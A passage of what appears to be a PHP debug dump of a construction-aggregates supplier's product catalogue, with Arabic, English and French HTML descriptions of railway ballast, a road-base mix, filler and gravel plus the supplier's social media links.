<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يجب أن تتوافق عناصر</span></span></small><span style="font-size:16px"><strong>حصى الصابورة</strong></span><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> معًا لتشكيل كتلة مضغوطة ولكنها قابلة للاختراق</span></span></small></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">يتم التحكم في <strong>حصى الصابورة</strong> مقاس <strong>25/50 مم</strong> وفقًا لمعيار <strong>NA 5113</strong>.</span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><span style="font-size:16px"><strong><u>مجال الاستعمال</u></strong></span><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></small></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة </strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>25/50 مم </strong>في :</span></span></span></p>
<ul dir="rtl">
<li>
<p style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>السكك الحديدية</strong></span></span></span></p>
</li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><span style="font-size:16px"><strong><u>عراقيل:</u></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">ت</span></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px">خضع </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> لنوعين من التآكل:</span></span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> التلوث بالمواد الطفيلية ، مثل الأرض. تتم إزالة الأعشاب الضارة ، ولكن من الضروري استبدال </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> بانتظام ؛</span></span></span></li>
<li style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> تسوية </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> تحت الأعضاء المتقاطعة ؛ يتسبب في تشوه عمودي للمسار. من الضروري إعادة حقن</span></span><span style="font-size:16px"><strong> حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> ذات حجم الجسيمات الصغيرة تحت العوارض ؛ أو لإجراء عملية صيانة باستخدام آلة الدك. يتم تنفيذ هذا النوع من العمليات كل سبع سنوات تقريبًا.</span></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="color:#000000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">نقوم بغربلة </span></span><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong> كل عشرين عامًا لاستبدال الأحجار المكسورة. يبلغ العمر الافتراضي </span></span></span><span style="color:#FF0000"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">ل</span></span></span><span style="color:#000000"><span style="font-size:16px"><strong>حصى الصابورة</strong></span><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> </strong>حوالي أربعين عامًا قبل أن يتم استبدالها بالكامل.</span></span></span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The <strong>Gravel Ballast 25/50 mm</strong> is the layer of stones or gravel on which the railway track is anchored.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The<strong> Gravel Ballast</strong> refers to the mixture of pebbles and sand spread on the ground or under the railroad tracks. <strong>The Gravel Ballast</strong> came into use and replaced silting.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The elements of the <strong>Gravel Ballast</strong> generally used: crushed stone, with a grain size varying between 31.5 and 50 mm. The type of rocks used varies according to</span></span> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">regions and countries depending on the climate. There are rocks of the plutonic type: granite, diorite, etc. </span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The elements of the <strong>Gravel Ballast</strong> must fit together to form a compact but permeable mass.</span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The <strong>Gravel Ballast 25/50 mm</strong> is controlled according to the <strong>NA 5113 </strong>Standard.</span></span></p>
<pre style="text-align:right">
</pre>
<p style="text-align:left"><u><span style="color:#008000"><strong><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Constraints:</span></span></strong></span></u></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Gravel Ballast undergoes two types of wear:</span></span></p>
<ul>
<li style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Contamination by parasitic materials, eg earth. Weeding is carried out, but it is necessary to replace the <strong>Gravel Ballast</strong> regularly;</span></span></li>
<li style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Settlement of the <strong>Gravel Ballast</strong> under the cross members; it causes a vertical deformation of the track. It is necessary to reinject the <strong>Gravel Ballast</strong> of small particle size under the sleepers; or to carry out a maintenance operation using a tamping machine. This kind of operation is carried out approximately every seven years.</span></span></li>
</ul>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">We sift the <strong>Gravel Ballast</strong> every twenty years to replace the broken stones. The <strong>Gravel Ballast</strong> has a useful life of about forty years before having to be completely replaced.</span></span></p>
',
'img_prd' => 'produit-1611734651.png',
'img_prd_detail' => '',
'Code_Pr' => '9959',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611734651.pdf',
'pos_slider' => '3'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 7 => array(
'Produit' => array(
'id' => '878836',
'nom_fr' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'nom_ara' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'nom_en' => 'Tout Venant Confondu -TVC- 0/31.5 mm',
'sous_nom_fr' => '',
'sous_nom_ara' => '',
'sous_nom_en' => '',
'date_ajout' => '2021-01-26',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le<strong> Tout Venant Confondu -TVC- 0/31.5 mm </strong> est un mélange de Granulats de toutes dimensions. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisation</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le<strong> Tout Venant Confondu -TVC- 0/31.5 mm</strong> est utilisé dans les :</span></span></p>
<ul>
<li><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Assises de Chaussées (Couche de Base)</strong></span></span></li>
</ul>
<p style="margin-left:36pt"> </p>
<p> </p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إن <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> عبارة عن مزيج من الركام من جميع الأحجام.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong><u>مجال الاستعمال</u> :</strong></span></span></small></span></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يتم استخدام <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> في:</span></span></small></p>
<ul dir="rtl">
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الطبقات الأرضية (الطبقة الأساسية)</strong></span></span></small></li>
</ul>
',
'contenu_en' => '<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> is a mixture of aggregates of all sizes.</span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><u><strong>Use</strong></u></span><strong><span style="color:#008000"> :</span></strong></span></span></p>
<p style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Tout Venant Confondu -TVC- 0/31.5 mm</strong> is used in:</span></span></p>
<ul>
<li style="text-align:left"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Ground Layers (Base Layer)</strong></span></span></li>
</ul>
',
'img_prd' => 'produit-1611671534.png',
'img_prd_detail' => '',
'Code_Pr' => '0',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611671534.pdf',
'pos_slider' => '2'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 8 => array(
'Produit' => array(
'id' => '59998',
'nom_fr' => 'Filler 0/0,063 mm ',
'nom_ara' => 'Filler 0/0,063 mm الحشو 0 / 0.063 مم ',
'nom_en' => 'Filler 0/0,063 mm ',
'sous_nom_fr' => '',
'sous_nom_ara' => '',
'sous_nom_en' => '',
'date_ajout' => '2021-01-26',
'image' => '',
'contenu_fr' => '<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm</strong> est un granulat fin destiné à remplir, à charger divers produits des industries du BTP. </span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm </strong>est une<strong> </strong>matière minérale, finement divisée destinée à remplir (de l'Anglais to fill) les vides laissés par un empilement granulaire de graviers, gravillons et sables. </span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le terme <strong>Filler</strong> se rapporte à la petite taille des grains qui le constitue. La nature chimico- minéralogique du <strong>Filler</strong> peut varier, il s'agit généralement de calcaire broyé mais les cendres volantes, la fumée de silice ou une combinaison de ces matériaux peut être utilisée comme <strong>Filler</strong>. </span></span></small></span></p>
<ul>
</ul>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></small></span></p>
<p><span style="color:#008000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong><u>Utilisations</u> :</strong></span></span></small></span></p>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Le <strong>Filler 0/0,063</strong> <strong>mm </strong>charge :</span></span></small></span></p>
<ul>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">L'asphalte artificiel à des doses voisines de 10 %, pour son pouvoir rigidifiant ;</span></span></small></span></p>
</li>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Les enrobés bitumineux ,à des doses voisines de 3 à 4 % ou 5 à 6 %, pour son pouvoir rigidifiant ;</span></span></small></span></p>
</li>
<li>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">Les bétons de ciment hydraulique, à des doses voisines de 50 à 80 kg par m<sup>3</sup>, comme substitution du ciment ; il s'agit le plus souvent de la fumée de silice (micro- ou nanoparticules issues de la métallurgie du silicium et de ses alliages).</span></span></small></span></p>
</li>
</ul>
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px">L'utilisation des <strong>Fillers</strong> dans des dosages appropriés dans la formulation des bétons permet d'améliorer les propriétés d'écoulement du béton frais et les résistances mécaniques du béton durcis.</span></span></small></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم</strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">- عبارة عن </span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">رمل</span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000"> ناعم مخصص لملء وتحميل منتجات مختلفة<small> من صناعات البناء.</small></span></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم</strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> عبارة عن مادة معدنية مجزأة بدقة تهدف إلى ملء (من الإنجليزية ملء) الفراغات التي تتركها كومة حبيبية من الحصى والشظايا والرمال.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يشير مصطلح <strong>فيلر</strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler </strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> إلى صغر حجم الحبوب التي تتكون منها. يمكن أن تختلف الطبيعة الكيميائية المعدنية للحشو ، وعادة ما يكون من الحجر الجيري المطحون ولكن يمكن استخدام الرماد المتطاير أو دخان السيليكا أو مزيج من هذه المواد كمواد مالئة.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يتم التحكم في </span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>الحشو 0 / 0.063 مم </strong><span style="color:#000000">-</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> وفقًا لمعيار <strong>NA</strong> <strong>5113</strong>.</span></span></small></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:20px"><span style="color:#008000"><strong><small><u>مجال الاستعمال</u> :</small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">يملأ <strong>الحشو 0 / 0.063 </strong></span></span></small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong><span style="color:#000000"> -</span></span></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>Filler 0/0,063</strong> <strong>mm</strong></span></span></small></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#000000">-</span></span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> :</span></span></small></p>
<ul dir="rtl">
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">إسفلت صناعي بجرعات تقترب من 10٪ لقدرته على التقوية ؛</span></span></small></li>
<li style="text-align: justify;"><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الخلائط البيتومينية بجرعات تقارب 3 إلى 4٪ أو 5 إلى 6٪ لقوتها التقوية ؛</span></span></small></li>
<li style="text-align: justify;"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">خرسانة </span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">الأسمنت الهيدروليكي ، بجرعات قريبة من 50 إلى 80 كجم لكل متر مكعب ، كبديل للأسمنت ؛ غالبًا ما يكون دخان السيليكا (جزيئات دقيقة أو نانوية من تعدين السيليكون وسبائكه)</span></span><small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">.</span></span></small></li>
</ul>
<p dir="rtl" style="text-align: justify;"> <span style="font-family:times new roman,times,serif"><span style="font-size:16px">إن استخدام <span style="color:#000000">-<strong>Fillers </strong>-</span> بالجرعات المناسبة في صياغة الخرسانة يجعل من الممكن تحسين خصائص التدفق للخرسانة الطازجة والقوة الميكانيكية للخرسانة المتصلدة.</span></span> </p>
',
'contenu_en' => '<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> is a fine aggregate intended to fill, to load various products of the construction industries.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> is a finely divided mineral material intended to fill the voids left by a granular pile of gravel, chippings and sands.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The term <strong>Filler </strong>refers to the small size of the grains that constitute it. The chemico-mineralogical nature of the <strong>Filler</strong> can vary, it is usually ground limestone but fly ash, silica fume or a combination of these can be used as a <strong>Filler</strong>.</span></span></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler</strong> <strong>0/0.063 mm</strong> is controlled according to the <strong>NA 5113 </strong>Standard.</span></span></span></p>
<p style="text-align:left"><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>Uses</u> :</span></span></strong></span></p>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The <strong>Filler 0/0.063 mm</strong> charges:</span></span></span></p>
<ul>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Artificial asphalt at doses close to 10%, for its </span></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif">stiffening power;</span></span></span></li>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Bituminous mixes, at doses close to 3 to 4% or 5 to 6%, for its stiffening power;</span></span></span></li>
<li style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Hydraulic cement concretes, at doses close to 50 to 80 kg per m3, as a replacement for cement; it is most often silica fume (micro- or nanoparticles from the metallurgy of silicon and its alloys).</span></span></span></li>
</ul>
<p style="text-align:left"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">The use of <strong>Fillers </strong>in appropriate dosages in the formulation of concrete makes it possible to improve the flow properties of fresh concrete and the mechanical strengths of hardened concrete.</span></span></span></p>
',
'img_prd' => 'produit-1611671831.png',
'img_prd_detail' => '',
'Code_Pr' => '59998',
'prix_u' => '500',
'fiche_technique' => 'fiche_technique-1615802851.pdf',
'pos_slider' => '1'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
)
)
$socialMediaLinks = array(
(int) 0 => array(
'Sociale' => array(
'id' => '1',
'nom' => 'Facebook',
'lien' => 'https://www.facebook.com/scimat.dz',
'image' => 'fab fa-facebook-f ',
'color' => '#4267B2',
'date_ajout' => '2016-05-02'
)
),
(int) 1 => array(
'Sociale' => array(
'id' => '2',
'nom' => 'Instagram',
'lien' => 'https://www.instagram.com/',
'image' => 'fab fa-instagram',
'color' => 'linear-gradient(45deg, #405de6, #5851db, #833ab4, #c13584, #e1306c, #fd1d1d)',
'date_ajout' => '2020-11-17'
)
),
(int) 2 => array(
'Sociale' => array(
'id' => '3',
'nom' => 'whatsapp',
'lien' => 'https://whatsapp.com',
'image' => 'fab fa-whatsapp',
'color' => '#25D366',
'date_ajout' => '2018-11-03'
)
),
(int) 3 => array(
'Sociale' => array(
'id' => '4',
'nom' => 'youtube',
'lien' => 'http://www.youtube.com/@scimatgica ',
'image' => 'fab fa-youtube',
'color' => '#FF0000',
'date_ajout' => '2018-12-23'
)
),
(int) 4 => array(
'Sociale' => array(
'id' => '5',
'nom' => 'Linkedin',
'lien' => 'linkedin.com/in/scimat',
'image' => 'fab fa-linkedin',
'color' => '#4267B2',
'date_ajout' => '2024-02-07'
)
),
(int) 5 => array(
'Sociale' => array(
'id' => '6',
'nom' => 'X',
'lien' => 'www.twitter.com/ScimatGica',
'image' => 'fab fa-twitter',
'color' => '#4267B2',
'date_ajout' => '2024-02-07'
)
)
)
$produits = array(
(int) 0 => array(
'Produit' => array(
'id' => '125',
'nom_fr' => 'Gravier ',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '8/15 mm',
'sous_nom_ara' => ' 8/15 مم',
'sous_nom_en' => '8/15 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>8/15 mm </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Gravier</strong> <strong>8/15 mm</strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Gravier</strong> <strong>8/15 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Gravier</strong> <strong>8/15 mm</strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="color:#008000"><strong><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> :</span></span></small></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></li>
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام <span style="color:#000000">تتكيف</span> مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 15/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><u><span style="color:#008000"><strong>Uses</strong></span></u><span style="color:#008000"><strong> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm </span></small></strong><small><span style="font-size:16px">is</span></small><strong><small><span style="font-size:16px"> </span></small></strong></span>used bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span> is included in :</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> </span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong> Hydraulic Concrete</strong></span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></span></p>
</li>
</ul>
